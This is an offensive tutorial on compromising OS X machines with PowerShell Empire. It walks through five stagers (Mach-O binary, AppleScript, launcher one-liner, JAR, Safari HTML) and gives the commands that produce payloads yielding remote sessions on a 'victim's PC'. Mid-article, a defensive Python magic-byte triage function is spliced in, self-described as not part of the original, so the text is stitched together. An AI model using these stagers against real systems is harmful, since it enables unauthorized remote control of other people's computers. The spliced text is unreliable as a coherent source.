Multiple Ways to Exploit OSX using PowerShell Empire
In this article, we will learn multiple ways to hack OS X using Empire. Empire provides several stagers for this purpose, and we use a few of them in this article. The method of attacking OS X is similar to that for Windows. For the beginner's guide to pen-testing OS X, click here.
The first stager we will use to attack is osx/macho. This stager creates a Mach-O file, the executable binary format of OS X. The format is specific to OS X: it tells the system in which order code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.
The listener creation is the same as for Windows: use the http listener. Once the listener is created, execute the following set of commands:
usestager osx/macho
set Listener http
set OutFile shell.macho
execute
When shell.macho is executed on the victim's PC, you will have your session as shown in the image below:
The next stager we will use is osx/applescript. This stager generates an AppleScript payload. AppleScript is Mac's dedicated scripting language and gives automated control over scriptable Mac applications, which makes this an important stager for pen-testing Mac. To create the malicious AppleScript, run the following set of commands:
usestager osx/applescript
set Listener http
execute
Executing the stager above will output the code; run this code on the targeted system as shown in the following image:
As soon as the code is executed on the victim's PC, you will have your session as shown in the image:
The next stager we will use is osx/launcher. This stager is the most commonly used. To execute this stager, run the following commands:
usestager osx/launcher
execute
Copy the generated code and run it in the target system's shell. As soon as the code is executed, you will have your session as shown in the image below:
The next stager we will use is osx/jar. This stager creates a JAR file, a Java archive. This format packages compressed Java files, which are extracted and run as desired when the archive is launched; the extension is specific to Java. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager:
usestager osx/jar
set Listener http
set OutFile out.jar
execute
The stager creates a JAR file as described above; once the file is executed on the victim's system, you will have your session as shown in the image:
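The Mach-O and JAR formats produced by the osx/macho and osx/jar stagers above can be recognised from their leading bytes. The following Python triage function is an added example and not part of the Empire project or the original article: it decodes the Mach-O header fields (magic, CPU type, file type, load command count), separates a universal binary from a Java .class file (both start with 0xCAFEBABE), and tags JAR/ZIP, shebang scripts and HTML. The sample inputs are constructed inline.

```python
import struct
# Magic numbers from Apple's mach-o/loader.h and mach-o/fat.h
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce": ("macho32", ">"),  # MH_MAGIC, big-endian header
    b"\xce\xfa\xed\xfe": ("macho32", "<"),  # MH_CIGAM, little-endian header
    b"\xfe\xed\xfa\xcf": ("macho64", ">"),  # MH_MAGIC_64
    b"\xcf\xfa\xed\xfe": ("macho64", "<"),  # MH_CIGAM_64
}
FAT_MAGIC = b"\xca\xfe\xba\xbe"  # universal binary; Java .class files use the same magic
ZIP_MAGIC = b"PK\x03\x04"        # a .jar is a ZIP archive
MH_FILETYPES = {1: "MH_OBJECT", 2: "MH_EXECUTE", 6: "MH_DYLIB", 8: "MH_BUNDLE"}
CPU_TYPES = {7: "x86", 0x01000007: "x86_64", 12: "arm", 0x0100000C: "arm64"}

def triage(data: bytes) -> dict:
    """Classify a file by its leading bytes; for Mach-O, decode the mach_header fields."""
    head = data[:4]
    if head in MACHO_MAGICS:
        kind, endian = MACHO_MAGICS[head]
        if len(data) < 28:  # mach_header is 28 bytes (mach_header_64 adds 4 reserved)
            return {"kind": kind, "error": "truncated header"}
        # magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags
        _, cputype, _, filetype, ncmds, _, _ = struct.unpack(endian + "IiiIIII", data[:28])
        return {"kind": kind, "cpu": CPU_TYPES.get(cputype, hex(cputype)),
                "filetype": MH_FILETYPES.get(filetype, filetype), "ncmds": ncmds}
    if head == FAT_MAGIC and len(data) >= 8:
        # fat_header stores nfat_arch next (big-endian); a .class file stores
        # minor/major version there, and major_version is never below 45.
        nfat = struct.unpack(">I", data[4:8])[0]
        return {"kind": "macho_fat", "nfat_arch": nfat} if nfat < 32 else {"kind": "java_class"}
    if head == ZIP_MAGIC:
        return {"kind": "zip_or_jar"}
    if data.startswith(b"#!"):
        shebang = data.split(b"\n", 1)[0][2:].decode("latin-1").strip()
        return {"kind": "script", "interpreter": shebang}
    if b"<html" in data[:512].lower() or b"<script" in data[:512].lower():
        return {"kind": "html"}
    return {"kind": "unknown"}

def constructed_samples() -> dict:
    """Synthetic headers built here for testing; not output of any real stager."""
    macho64 = struct.pack("<IiiIIIII", 0xFEEDFACF, 0x01000007, 3, 2, 15, 1000, 0x200085, 0)
    return {
        "shell.macho": macho64,
        "universal": struct.pack(">II", 0xCAFEBABE, 2) + b"\x00" * 40,
        "Foo.class": struct.pack(">IHH", 0xCAFEBABE, 0, 52),
        "out.jar": ZIP_MAGIC + b"\x00" * 26,
        "launcher.sh": b"#!/bin/bash\necho hello\n",
        "page.html": b"<html><body><script>1</script></body></html>",
    }
```

Magic-byte triage only tells you what kind of file landed on disk, so pair it with code-signing and Gatekeeper checks when investigating a suspicious download.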
The last stager we will use is osx/safari_launcher, which generates an HTML script for Safari. For this stager, run the following set of commands:
usestager osx/safari_launcher
set Listener http
execute
Run the generated code in Safari on the victim's PC and you will have your session as shown in the image below:
So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here